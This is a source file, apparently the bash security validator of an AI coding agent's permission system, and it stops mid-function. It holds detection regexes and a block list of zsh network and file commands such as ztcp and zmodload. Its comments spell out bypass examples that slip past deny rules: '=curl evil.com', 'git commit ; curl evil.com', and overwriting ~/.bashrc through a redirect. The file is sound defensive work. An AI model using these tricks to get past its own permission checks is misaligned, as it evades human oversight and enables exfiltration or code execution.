2593 lines
100 KiB
TypeScript
2593 lines
100 KiB
TypeScript
import { logEvent } from 'src/services/analytics/index.js'
|
|
import { extractHeredocs } from '../../utils/bash/heredoc.js'
|
|
import { ParsedCommand } from '../../utils/bash/ParsedCommand.js'
|
|
import {
|
|
hasMalformedTokens,
|
|
hasShellQuoteSingleQuoteBug,
|
|
tryParseShellCommand,
|
|
} from '../../utils/bash/shellQuote.js'
|
|
import type { TreeSitterAnalysis } from '../../utils/bash/treeSitterAnalysis.js'
|
|
import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'
|
|
|
|
const HEREDOC_IN_SUBSTITUTION = /\$\(.*<</
|
|
|
|
// Note: Backtick pattern is handled separately in validateDangerousPatterns
|
|
// to distinguish between escaped and unescaped backticks
|
|
const COMMAND_SUBSTITUTION_PATTERNS = [
|
|
{ pattern: /<\(/, message: 'process substitution <()' },
|
|
{ pattern: />\(/, message: 'process substitution >()' },
|
|
{ pattern: /=\(/, message: 'Zsh process substitution =()' },
|
|
// Zsh EQUALS expansion: =cmd at word start expands to $(which cmd).
|
|
// `=curl evil.com` → `/usr/bin/curl evil.com`, bypassing Bash(curl:*) deny
|
|
// rules since the parser sees `=curl` as the base command, not `curl`.
|
|
// Only matches word-initial = followed by a command-name char (not VAR=val).
|
|
{
|
|
pattern: /(?:^|[\s;&|])=[a-zA-Z_]/,
|
|
message: 'Zsh equals expansion (=cmd)',
|
|
},
|
|
{ pattern: /\$\(/, message: '$() command substitution' },
|
|
{ pattern: /\$\{/, message: '${} parameter substitution' },
|
|
{ pattern: /\$\[/, message: '$[] legacy arithmetic expansion' },
|
|
{ pattern: /~\[/, message: 'Zsh-style parameter expansion' },
|
|
{ pattern: /\(e:/, message: 'Zsh-style glob qualifiers' },
|
|
{ pattern: /\(\+/, message: 'Zsh glob qualifier with command execution' },
|
|
{
|
|
pattern: /\}\s*always\s*\{/,
|
|
message: 'Zsh always block (try/always construct)',
|
|
},
|
|
// Defense in depth: Block PowerShell comment syntax even though we don't execute in PowerShell
|
|
// Added as protection against future changes that might introduce PowerShell execution
|
|
{ pattern: /<#/, message: 'PowerShell comment syntax' },
|
|
]
|
|
|
|
// Zsh-specific dangerous commands that can bypass security checks.
|
|
// These are checked against the base command (first word) of each command segment.
|
|
const ZSH_DANGEROUS_COMMANDS = new Set([
|
|
// zmodload is the gateway to many dangerous module-based attacks:
|
|
// zsh/mapfile (invisible file I/O via array assignment),
|
|
// zsh/system (sysopen/syswrite two-step file access),
|
|
// zsh/zpty (pseudo-terminal command execution),
|
|
// zsh/net/tcp (network exfiltration via ztcp),
|
|
// zsh/files (builtin rm/mv/ln/chmod that bypass binary checks)
|
|
'zmodload',
|
|
// emulate with -c flag is an eval-equivalent that executes arbitrary code
|
|
'emulate',
|
|
// Zsh module builtins that enable dangerous operations.
|
|
// These require zmodload first, but we block them as defense-in-depth
|
|
// in case zmodload is somehow bypassed or the module is pre-loaded.
|
|
'sysopen', // Opens files with fine-grained control (zsh/system)
|
|
'sysread', // Reads from file descriptors (zsh/system)
|
|
'syswrite', // Writes to file descriptors (zsh/system)
|
|
'sysseek', // Seeks on file descriptors (zsh/system)
|
|
'zpty', // Executes commands on pseudo-terminals (zsh/zpty)
|
|
'ztcp', // Creates TCP connections for exfiltration (zsh/net/tcp)
|
|
'zsocket', // Creates Unix/TCP sockets (zsh/net/socket)
|
|
'mapfile', // Not actually a command, but the associative array is set via zmodload
|
|
'zf_rm', // Builtin rm from zsh/files
|
|
'zf_mv', // Builtin mv from zsh/files
|
|
'zf_ln', // Builtin ln from zsh/files
|
|
'zf_chmod', // Builtin chmod from zsh/files
|
|
'zf_chown', // Builtin chown from zsh/files
|
|
'zf_mkdir', // Builtin mkdir from zsh/files
|
|
'zf_rmdir', // Builtin rmdir from zsh/files
|
|
'zf_chgrp', // Builtin chgrp from zsh/files
|
|
])
|
|
|
|
// Numeric identifiers for bash security checks (to avoid logging strings)
|
|
const BASH_SECURITY_CHECK_IDS = {
|
|
INCOMPLETE_COMMANDS: 1,
|
|
JQ_SYSTEM_FUNCTION: 2,
|
|
JQ_FILE_ARGUMENTS: 3,
|
|
OBFUSCATED_FLAGS: 4,
|
|
SHELL_METACHARACTERS: 5,
|
|
DANGEROUS_VARIABLES: 6,
|
|
NEWLINES: 7,
|
|
DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION: 8,
|
|
DANGEROUS_PATTERNS_INPUT_REDIRECTION: 9,
|
|
DANGEROUS_PATTERNS_OUTPUT_REDIRECTION: 10,
|
|
IFS_INJECTION: 11,
|
|
GIT_COMMIT_SUBSTITUTION: 12,
|
|
PROC_ENVIRON_ACCESS: 13,
|
|
MALFORMED_TOKEN_INJECTION: 14,
|
|
BACKSLASH_ESCAPED_WHITESPACE: 15,
|
|
BRACE_EXPANSION: 16,
|
|
CONTROL_CHARACTERS: 17,
|
|
UNICODE_WHITESPACE: 18,
|
|
MID_WORD_HASH: 19,
|
|
ZSH_DANGEROUS_COMMANDS: 20,
|
|
BACKSLASH_ESCAPED_OPERATORS: 21,
|
|
COMMENT_QUOTE_DESYNC: 22,
|
|
QUOTED_NEWLINE: 23,
|
|
} as const
|
|
|
|
type ValidationContext = {
|
|
originalCommand: string
|
|
baseCommand: string
|
|
unquotedContent: string
|
|
fullyUnquotedContent: string
|
|
/** fullyUnquoted before stripSafeRedirections — used by validateBraceExpansion
|
|
* to avoid false negatives from redirection stripping creating backslash adjacencies */
|
|
fullyUnquotedPreStrip: string
|
|
/** Like fullyUnquotedPreStrip but preserves quote characters ('/"): e.g.,
|
|
* echo 'x'# → echo ''# (the quote chars remain, revealing adjacency to #) */
|
|
unquotedKeepQuoteChars: string
|
|
/** Tree-sitter analysis data, if available. Validators can use this for
|
|
* more accurate analysis when present, falling back to regex otherwise. */
|
|
treeSitter?: TreeSitterAnalysis | null
|
|
}
|
|
|
|
type QuoteExtraction = {
|
|
withDoubleQuotes: string
|
|
fullyUnquoted: string
|
|
/** Like fullyUnquoted but preserves quote characters ('/"): strips quoted
|
|
* content while keeping the delimiters. Used by validateMidWordHash to detect
|
|
* quote-adjacent # (e.g., 'x'# where quote stripping would hide adjacency). */
|
|
unquotedKeepQuoteChars: string
|
|
}
|
|
|
|
function extractQuotedContent(command: string, isJq = false): QuoteExtraction {
|
|
let withDoubleQuotes = ''
|
|
let fullyUnquoted = ''
|
|
let unquotedKeepQuoteChars = ''
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
let escaped = false
|
|
|
|
for (let i = 0; i < command.length; i++) {
|
|
const char = command[i]
|
|
|
|
if (escaped) {
|
|
escaped = false
|
|
if (!inSingleQuote) withDoubleQuotes += char
|
|
if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char
|
|
if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char
|
|
continue
|
|
}
|
|
|
|
if (char === '\\' && !inSingleQuote) {
|
|
escaped = true
|
|
if (!inSingleQuote) withDoubleQuotes += char
|
|
if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char
|
|
if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char
|
|
continue
|
|
}
|
|
|
|
if (char === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
unquotedKeepQuoteChars += char
|
|
continue
|
|
}
|
|
|
|
if (char === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
unquotedKeepQuoteChars += char
|
|
// For jq, include quotes in extraction to ensure content is properly analyzed
|
|
if (!isJq) continue
|
|
}
|
|
|
|
if (!inSingleQuote) withDoubleQuotes += char
|
|
if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char
|
|
if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char
|
|
}
|
|
|
|
return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
|
|
}
|
|
|
|
function stripSafeRedirections(content: string): string {
|
|
// SECURITY: All three patterns MUST have a trailing boundary (?=\s|$).
|
|
// Without it, `> /dev/nullo` matches `/dev/null` as a PREFIX, strips
|
|
// `> /dev/null` leaving `o`, so `echo hi > /dev/nullo` becomes `echo hi o`.
|
|
// validateRedirections then sees no `>` and passes. The file write to
|
|
// /dev/nullo is auto-allowed via the read-only path (checkReadOnlyConstraints).
|
|
// Main bashPermissions flow is protected (checkPathConstraints validates the
|
|
// original command), but speculation.ts uses checkReadOnlyConstraints alone.
|
|
return content
|
|
.replace(/\s+2\s*>&\s*1(?=\s|$)/g, '')
|
|
.replace(/[012]?\s*>\s*\/dev\/null(?=\s|$)/g, '')
|
|
.replace(/\s*<\s*\/dev\/null(?=\s|$)/g, '')
|
|
}
|
|
|
|
/**
|
|
* Checks if content contains an unescaped occurrence of a single character.
|
|
* Handles bash escape sequences correctly where a backslash escapes the following character.
|
|
*
|
|
* IMPORTANT: This function only handles single characters, not strings. If you need to extend
|
|
* this to handle multi-character strings, be EXTREMELY CAREFUL about shell ANSI-C quoting
|
|
* (e.g., $'\n', $'\x41', $'\u0041') which can encode arbitrary characters and strings in ways
|
|
* that are very difficult to parse correctly. Incorrect handling could introduce security
|
|
* vulnerabilities by allowing attackers to bypass security checks.
|
|
*
|
|
* @param content - The string to search (typically from extractQuotedContent)
|
|
* @param char - Single character to search for (e.g., '`')
|
|
* @returns true if unescaped occurrence found, false otherwise
|
|
*
|
|
* Examples:
|
|
* hasUnescapedChar("test \`safe\`", '`') → false (escaped backticks)
|
|
* hasUnescapedChar("test `dangerous`", '`') → true (unescaped backticks)
|
|
* hasUnescapedChar("test\\`date`", '`') → true (escaped backslash + unescaped backtick)
|
|
*/
|
|
function hasUnescapedChar(content: string, char: string): boolean {
|
|
if (char.length !== 1) {
|
|
throw new Error('hasUnescapedChar only works with single characters')
|
|
}
|
|
|
|
let i = 0
|
|
while (i < content.length) {
|
|
// If we see a backslash, skip it and the next character (they form an escape sequence)
|
|
if (content[i] === '\\' && i + 1 < content.length) {
|
|
i += 2 // Skip backslash and escaped character
|
|
continue
|
|
}
|
|
|
|
// Check if current character matches
|
|
if (content[i] === char) {
|
|
return true // Found unescaped occurrence
|
|
}
|
|
|
|
i++
|
|
}
|
|
|
|
return false // No unescaped occurrences found
|
|
}
|
|
|
|
function validateEmpty(context: ValidationContext): PermissionResult {
|
|
if (!context.originalCommand.trim()) {
|
|
return {
|
|
behavior: 'allow',
|
|
updatedInput: { command: context.originalCommand },
|
|
decisionReason: { type: 'other', reason: 'Empty command is safe' },
|
|
}
|
|
}
|
|
return { behavior: 'passthrough', message: 'Command is not empty' }
|
|
}
|
|
|
|
function validateIncompleteCommands(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { originalCommand } = context
|
|
const trimmed = originalCommand.trim()
|
|
|
|
if (/^\s*\t/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command appears to be an incomplete fragment (starts with tab)',
|
|
}
|
|
}
|
|
|
|
if (trimmed.startsWith('-')) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
|
|
subId: 2,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command appears to be an incomplete fragment (starts with flags)',
|
|
}
|
|
}
|
|
|
|
if (/^\s*(&&|\|\||;|>>?|<)/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
|
|
subId: 3,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command appears to be a continuation line (starts with operator)',
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'Command appears complete' }
|
|
}
|
|
|
|
/**
|
|
* Checks if a command is a "safe" heredoc-in-substitution pattern that can
|
|
* bypass the generic $() validator.
|
|
*
|
|
* This is an EARLY-ALLOW path: returning `true` causes bashCommandIsSafe to
|
|
* return `passthrough`, bypassing ALL subsequent validators. Given this
|
|
* authority, the check must be PROVABLY safe, not "probably safe".
|
|
*
|
|
* The only pattern we allow is:
|
|
* [prefix] $(cat <<'DELIM'\n
|
|
* [body lines]\n
|
|
* DELIM\n
|
|
* ) [suffix]
|
|
*
|
|
* Where:
|
|
* - The delimiter must be single-quoted ('DELIM') or escaped (\DELIM) so the
|
|
* body is literal text with no expansion
|
|
* - The closing delimiter must be on a line BY ITSELF (or with only trailing
|
|
* whitespace + `)` for the $(cat <<'EOF'\n...\nEOF)` inline form)
|
|
* - The closing delimiter must be the FIRST such line — matching bash's
|
|
* behavior exactly (no skipping past early delimiters to find EOF))
|
|
* - There must be non-whitespace text BEFORE the $( (i.e., the substitution
|
|
* is used in argument position, not as a command name). Otherwise the
|
|
* heredoc body becomes an arbitrary command name with [suffix] as args.
|
|
* - The remaining text (with the heredoc stripped) must pass all validators
|
|
*
|
|
* This implementation uses LINE-BASED matching, not regex [\s\S]*?, to
|
|
* precisely replicate bash's heredoc-closing behavior.
|
|
*/
|
|
function isSafeHeredoc(command: string): boolean {
|
|
if (!HEREDOC_IN_SUBSTITUTION.test(command)) return false
|
|
|
|
// SECURITY: Use [ \t] (not \s) between << and the delimiter. \s matches
|
|
// newlines, but bash requires the delimiter word on the same line as <<.
|
|
// Matching across newlines could accept malformed syntax that bash rejects.
|
|
// Handle quote variations: 'EOF', ''EOF'' (splitCommand may mangle quotes).
|
|
const heredocPattern =
|
|
/\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g
|
|
let match
|
|
type HeredocMatch = {
|
|
start: number
|
|
operatorEnd: number
|
|
delimiter: string
|
|
isDash: boolean
|
|
}
|
|
const safeHeredocs: HeredocMatch[] = []
|
|
|
|
while ((match = heredocPattern.exec(command)) !== null) {
|
|
const delimiter = match[2] || match[3]
|
|
if (delimiter) {
|
|
safeHeredocs.push({
|
|
start: match.index,
|
|
operatorEnd: match.index + match[0].length,
|
|
delimiter,
|
|
isDash: match[1] === '-',
|
|
})
|
|
}
|
|
}
|
|
|
|
// If no safe heredoc patterns found, it's not safe
|
|
if (safeHeredocs.length === 0) return false
|
|
|
|
// SECURITY: For each heredoc, find the closing delimiter using LINE-BASED
|
|
// matching that exactly replicates bash's behavior. Bash closes a heredoc
|
|
// at the FIRST line that exactly matches the delimiter. Any subsequent
|
|
// occurrence of the delimiter is just content (or a new command). Regex
|
|
// [\s\S]*? can skip past the first delimiter to find a later `DELIM)`
|
|
// pattern, hiding injected commands between the two delimiters.
|
|
type VerifiedHeredoc = { start: number; end: number }
|
|
const verified: VerifiedHeredoc[] = []
|
|
|
|
for (const { start, operatorEnd, delimiter, isDash } of safeHeredocs) {
|
|
// The opening line must end immediately after the delimiter (only
|
|
// horizontal whitespace allowed before the newline). If there's other
|
|
// content (like `; rm -rf /`), this is not a simple safe heredoc.
|
|
const afterOperator = command.slice(operatorEnd)
|
|
const openLineEnd = afterOperator.indexOf('\n')
|
|
if (openLineEnd === -1) return false // No content at all
|
|
const openLineTail = afterOperator.slice(0, openLineEnd)
|
|
if (!/^[ \t]*$/.test(openLineTail)) return false // Extra content on open line
|
|
|
|
// Body starts after the newline
|
|
const bodyStart = operatorEnd + openLineEnd + 1
|
|
const body = command.slice(bodyStart)
|
|
const bodyLines = body.split('\n')
|
|
|
|
// Find the FIRST line that closes the heredoc. There are two valid forms:
|
|
// 1. `DELIM` alone on a line (bash-standard), followed by `)` on the
|
|
// next line (with only whitespace before it)
|
|
// 2. `DELIM)` on a line (the inline $(cat <<'EOF'\n...\nEOF) form,
|
|
// where bash's PST_EOFTOKEN closes both heredoc and substitution)
|
|
// For <<-, leading tabs are stripped before matching.
|
|
let closingLineIdx = -1
|
|
let closeParenLineIdx = -1 // Line index where `)` appears
|
|
let closeParenColIdx = -1 // Column index of `)` on that line
|
|
|
|
for (let i = 0; i < bodyLines.length; i++) {
|
|
const rawLine = bodyLines[i]!
|
|
const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine
|
|
|
|
// Form 1: delimiter alone on a line
|
|
if (line === delimiter) {
|
|
closingLineIdx = i
|
|
// The `)` must be on the NEXT line with only whitespace before it
|
|
const nextLine = bodyLines[i + 1]
|
|
if (nextLine === undefined) return false // No closing `)`
|
|
const parenMatch = nextLine.match(/^([ \t]*)\)/)
|
|
if (!parenMatch) return false // `)` not at start of next line
|
|
closeParenLineIdx = i + 1
|
|
closeParenColIdx = parenMatch[1]!.length // Position of `)`
|
|
break
|
|
}
|
|
|
|
// Form 2: delimiter immediately followed by `)` (PST_EOFTOKEN form)
|
|
// Only whitespace allowed between delimiter and `)`.
|
|
if (line.startsWith(delimiter)) {
|
|
const afterDelim = line.slice(delimiter.length)
|
|
const parenMatch = afterDelim.match(/^([ \t]*)\)/)
|
|
if (parenMatch) {
|
|
closingLineIdx = i
|
|
closeParenLineIdx = i
|
|
// Column is in rawLine (pre-tab-strip), so recompute
|
|
const tabPrefix = isDash ? (rawLine.match(/^\t*/)?.[0] ?? '') : ''
|
|
closeParenColIdx =
|
|
tabPrefix.length + delimiter.length + parenMatch[1]!.length
|
|
break
|
|
}
|
|
// Line starts with delimiter but has other trailing content —
|
|
// this is NOT the closing line (bash requires exact match or EOF`)`).
|
|
// But it's also a red flag: if this were inside $(), bash might
|
|
// close early via PST_EOFTOKEN with other shell metacharacters.
|
|
// We already handle that case in extractHeredocs — here we just
|
|
// reject it as not matching our safe pattern.
|
|
if (/^[)}`|&;(<>]/.test(afterDelim)) {
|
|
return false // Ambiguous early-closure pattern
|
|
}
|
|
}
|
|
}
|
|
|
|
if (closingLineIdx === -1) return false // No closing delimiter found
|
|
|
|
// Compute the absolute end position (one past the `)` character)
|
|
let endPos = bodyStart
|
|
for (let i = 0; i < closeParenLineIdx; i++) {
|
|
endPos += bodyLines[i]!.length + 1 // +1 for newline
|
|
}
|
|
endPos += closeParenColIdx + 1 // +1 to include the `)` itself
|
|
|
|
verified.push({ start, end: endPos })
|
|
}
|
|
|
|
// SECURITY: Reject nested matches. The regex finds $(cat <<'X' patterns
|
|
// in RAW TEXT without understanding quoted-heredoc semantics. When the
|
|
// outer heredoc has a quoted delimiter (<<'A'), its body is LITERAL text
|
|
// in bash — any inner $(cat <<'B' is just characters, not a real heredoc.
|
|
// But our regex matches both, producing NESTED ranges. Stripping nested
|
|
// ranges corrupts indices: after stripping the inner range, the outer
|
|
// range's `end` is stale (points past the shrunken string), causing
|
|
// `remaining.slice(end)` to return '' and silently drop any suffix
|
|
// (e.g., `; rm -rf /`). Since all our matched heredocs have quoted/escaped
|
|
// delimiters, a nested match inside the body is ALWAYS literal text —
|
|
// no legitimate user writes this pattern. Bail to safe fallback.
|
|
for (const outer of verified) {
|
|
for (const inner of verified) {
|
|
if (inner === outer) continue
|
|
if (inner.start > outer.start && inner.start < outer.end) {
|
|
return false
|
|
}
|
|
}
|
|
}
|
|
|
|
// Strip all verified heredocs from the command, building `remaining`.
|
|
// Process in reverse order so earlier indices stay valid.
|
|
const sortedVerified = [...verified].sort((a, b) => b.start - a.start)
|
|
let remaining = command
|
|
for (const { start, end } of sortedVerified) {
|
|
remaining = remaining.slice(0, start) + remaining.slice(end)
|
|
}
|
|
|
|
// SECURITY: The remaining text must NOT start with only whitespace before
|
|
// the (now-stripped) heredoc position IF there's non-whitespace after it.
|
|
// If the $() is in COMMAND-NAME position (no prefix), its output becomes
|
|
// the command to execute, with any suffix text as arguments:
|
|
// $(cat <<'EOF'\nchmod\nEOF\n) 777 /etc/shadow
|
|
// → runs `chmod 777 /etc/shadow`
|
|
// We only allow the substitution in ARGUMENT position: there must be a
|
|
// command word before the $(.
|
|
// After stripping, `remaining` should look like `cmd args... [more args]`.
|
|
// If remaining starts with only whitespace (or is empty), the $() WAS the
|
|
// command — that's only safe if there are no trailing arguments.
|
|
const trimmedRemaining = remaining.trim()
|
|
if (trimmedRemaining.length > 0) {
|
|
// There's a prefix command — good. But verify the original command
|
|
// also had a non-whitespace prefix before the FIRST $( (the heredoc
|
|
// could be one of several; we need the first one's prefix).
|
|
const firstHeredocStart = Math.min(...verified.map(v => v.start))
|
|
const prefix = command.slice(0, firstHeredocStart)
|
|
if (prefix.trim().length === 0) {
|
|
// $() is in command-name position but there's trailing text — UNSAFE.
|
|
// The heredoc body becomes the command name, trailing text becomes args.
|
|
return false
|
|
}
|
|
}
|
|
|
|
// Check that remaining text contains only safe characters.
|
|
// After stripping safe heredocs, the remaining text should only be command
|
|
// names, arguments, quotes, and whitespace. Reject ANY shell metacharacter
|
|
// to prevent operators (|, &, &&, ||, ;) or expansions ($, `, {, <, >) from
|
|
// being used to chain dangerous commands after a safe heredoc.
|
|
// SECURITY: Use explicit ASCII space/tab only — \s matches unicode whitespace
|
|
// like \u00A0 which can be used to hide content. Newlines are also blocked
|
|
// (they would indicate multi-line commands outside the heredoc body).
|
|
if (!/^[a-zA-Z0-9 \t"'.\-/_@=,:+~]*$/.test(remaining)) return false
|
|
|
|
// SECURITY: The remaining text (command with heredocs stripped) must also
|
|
// pass all security validators. Without this, appending a safe heredoc to a
|
|
// dangerous command (e.g., `zmodload zsh/system $(cat <<'EOF'\nx\nEOF\n)`)
|
|
// causes this early-allow path to return passthrough, bypassing
|
|
// validateZshDangerousCommands, validateProcEnvironAccess, and any other
|
|
// main validator that checks allowlist-safe character patterns.
|
|
// No recursion risk: `remaining` has no `$(... <<` pattern, so the recursive
|
|
// call's validateSafeCommandSubstitution returns passthrough immediately.
|
|
if (bashCommandIsSafe_DEPRECATED(remaining).behavior !== 'passthrough')
|
|
return false
|
|
|
|
return true
|
|
}
|
|
|
|
/**
|
|
* Detects well-formed $(cat <<'DELIM'...DELIM) heredoc substitution patterns.
|
|
* Returns the command with matched heredocs stripped, or null if none found.
|
|
* Used by the pre-split gate to strip safe heredocs and re-check the remainder.
|
|
*/
|
|
export function stripSafeHeredocSubstitutions(command: string): string | null {
|
|
if (!HEREDOC_IN_SUBSTITUTION.test(command)) return null
|
|
|
|
const heredocPattern =
|
|
/\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g
|
|
let result = command
|
|
let found = false
|
|
let match
|
|
const ranges: Array<{ start: number; end: number }> = []
|
|
while ((match = heredocPattern.exec(command)) !== null) {
|
|
if (match.index > 0 && command[match.index - 1] === '\\') continue
|
|
const delimiter = match[2] || match[3]
|
|
if (!delimiter) continue
|
|
const isDash = match[1] === '-'
|
|
const operatorEnd = match.index + match[0].length
|
|
|
|
const afterOperator = command.slice(operatorEnd)
|
|
const openLineEnd = afterOperator.indexOf('\n')
|
|
if (openLineEnd === -1) continue
|
|
if (!/^[ \t]*$/.test(afterOperator.slice(0, openLineEnd))) continue
|
|
|
|
const bodyStart = operatorEnd + openLineEnd + 1
|
|
const bodyLines = command.slice(bodyStart).split('\n')
|
|
for (let i = 0; i < bodyLines.length; i++) {
|
|
const rawLine = bodyLines[i]!
|
|
const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine
|
|
if (line.startsWith(delimiter)) {
|
|
const after = line.slice(delimiter.length)
|
|
let closePos = -1
|
|
if (/^[ \t]*\)/.test(after)) {
|
|
const lineStart =
|
|
bodyStart +
|
|
bodyLines.slice(0, i).join('\n').length +
|
|
(i > 0 ? 1 : 0)
|
|
closePos = command.indexOf(')', lineStart)
|
|
} else if (after === '') {
|
|
const nextLine = bodyLines[i + 1]
|
|
if (nextLine !== undefined && /^[ \t]*\)/.test(nextLine)) {
|
|
const nextLineStart =
|
|
bodyStart + bodyLines.slice(0, i + 1).join('\n').length + 1
|
|
closePos = command.indexOf(')', nextLineStart)
|
|
}
|
|
}
|
|
if (closePos !== -1) {
|
|
ranges.push({ start: match.index, end: closePos + 1 })
|
|
found = true
|
|
}
|
|
break
|
|
}
|
|
}
|
|
}
|
|
if (!found) return null
|
|
for (let i = ranges.length - 1; i >= 0; i--) {
|
|
const r = ranges[i]!
|
|
result = result.slice(0, r.start) + result.slice(r.end)
|
|
}
|
|
return result
|
|
}
|
|
|
|
/** Detection-only check: does the command contain a safe heredoc substitution? */
|
|
export function hasSafeHeredocSubstitution(command: string): boolean {
|
|
return stripSafeHeredocSubstitutions(command) !== null
|
|
}
|
|
|
|
function validateSafeCommandSubstitution(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
if (!HEREDOC_IN_SUBSTITUTION.test(originalCommand)) {
|
|
return { behavior: 'passthrough', message: 'No heredoc in substitution' }
|
|
}
|
|
|
|
if (isSafeHeredoc(originalCommand)) {
|
|
return {
|
|
behavior: 'allow',
|
|
updatedInput: { command: originalCommand },
|
|
decisionReason: {
|
|
type: 'other',
|
|
reason:
|
|
'Safe command substitution: cat with quoted/escaped heredoc delimiter',
|
|
},
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Command substitution needs validation',
|
|
}
|
|
}
|
|
|
|
function validateGitCommit(context: ValidationContext): PermissionResult {
|
|
const { originalCommand, baseCommand } = context
|
|
|
|
if (baseCommand !== 'git' || !/^git\s+commit\s+/.test(originalCommand)) {
|
|
return { behavior: 'passthrough', message: 'Not a git commit' }
|
|
}
|
|
|
|
// SECURITY: Backslashes can cause our regex to mis-identify quote boundaries
|
|
// (e.g., `git commit -m "test\"msg" && evil`). Legitimate commit messages
|
|
// virtually never contain backslashes, so bail to the full validator chain.
|
|
if (originalCommand.includes('\\')) {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Git commit contains backslash, needs full validation',
|
|
}
|
|
}
|
|
|
|
// SECURITY: The `.*?` before `-m` must NOT match shell operators. Previously
|
|
// `.*?` matched anything except `\n`, including `;`, `&`, `|`, `` ` ``, `$(`.
|
|
// For `git commit ; curl evil.com -m 'x'`, `.*?` swallowed `; curl evil.com `
|
|
// leaving remainder=`` (falsy → remainder check skipped) → returned `allow`
|
|
// for a compound command. Early-allow skips ALL main validators (line ~1908),
|
|
// nullifying validateQuotedNewline, validateBackslashEscapedOperators, etc.
|
|
// While splitCommand currently catches this downstream, early-allow is a
|
|
// POSITIVE ASSERTION that the FULL command is safe — which it is NOT.
|
|
//
|
|
// Also: `\s+` between `git` and `commit` must NOT match `\n`/`\r` (command
|
|
// separators in bash). Use `[ \t]+` for horizontal-only whitespace.
|
|
//
|
|
// The `[^;&|`$<>()\n\r]*?` class excludes shell metacharacters. We also
|
|
// exclude `<` and `>` here (redirects) — they're allowed in the REMAINDER
|
|
// for `--author="Name <email>"` but must not appear BEFORE `-m`.
|
|
const messageMatch = originalCommand.match(
|
|
/^git[ \t]+commit[ \t]+[^;&|`$<>()\n\r]*?-m[ \t]+(["'])([\s\S]*?)\1(.*)$/,
|
|
)
|
|
|
|
if (messageMatch) {
|
|
const [, quote, messageContent, remainder] = messageMatch
|
|
|
|
if (quote === '"' && messageContent && /\$\(|`|\$\{/.test(messageContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.GIT_COMMIT_SUBSTITUTION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Git commit message contains command substitution patterns',
|
|
}
|
|
}
|
|
|
|
// SECURITY: Check remainder for shell operators that could chain commands
|
|
// or redirect output. The `.*` before `-m` in the regex can swallow flags
|
|
// like `--amend`, leaving `&& evil` or `> ~/.bashrc` in the remainder.
|
|
// Previously we only checked for $() / `` / ${} here, missing operators
|
|
// like ; | & && || < >.
|
|
//
|
|
// `<` and `>` can legitimately appear INSIDE quotes in --author values
|
|
// like `--author="Name <email>"`. An UNQUOTED `>` is a shell redirect
|
|
// operator. Because validateGitCommit is an EARLY validator, returning
|
|
// `allow` here short-circuits bashCommandIsSafe and SKIPS
|
|
// validateRedirections. So we must bail to passthrough on unquoted `<>`
|
|
// to let the main validators handle it.
|
|
//
|
|
// Attack: `git commit --allow-empty -m 'payload' > ~/.bashrc`
|
|
// validateGitCommit returns allow → bashCommandIsSafe short-circuits →
|
|
// validateRedirections NEVER runs → ~/.bashrc overwritten with git
|
|
// stdout containing `payload` → RCE on next shell login.
|
|
if (remainder && /[;|&()`]|\$\(|\$\{/.test(remainder)) {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Git commit remainder contains shell metacharacters',
|
|
}
|
|
}
|
|
if (remainder) {
|
|
// Strip quoted content, then check for `<` or `>`. Quoted `<>` (email
|
|
// brackets in --author) are safe; unquoted `<>` are shell redirects.
|
|
// NOTE: This simple quote tracker has NO backslash handling. `\'`/`\"`
|
|
// outside quotes would desync it (bash: \' = literal ', tracker: toggles
|
|
// SQ). BUT line 584 already bailed on ANY backslash in originalCommand,
|
|
// so we never reach here with backslashes. For backslash-free input,
|
|
// simple quote toggling is correct (no way to escape quotes without \\).
|
|
let unquoted = ''
|
|
let inSQ = false
|
|
let inDQ = false
|
|
for (let i = 0; i < remainder.length; i++) {
|
|
const c = remainder[i]
|
|
if (c === "'" && !inDQ) {
|
|
inSQ = !inSQ
|
|
continue
|
|
}
|
|
if (c === '"' && !inSQ) {
|
|
inDQ = !inDQ
|
|
continue
|
|
}
|
|
if (!inSQ && !inDQ) unquoted += c
|
|
}
|
|
if (/[<>]/.test(unquoted)) {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Git commit remainder contains unquoted redirect operator',
|
|
}
|
|
}
|
|
}
|
|
|
|
// Security hardening: block messages starting with dash
|
|
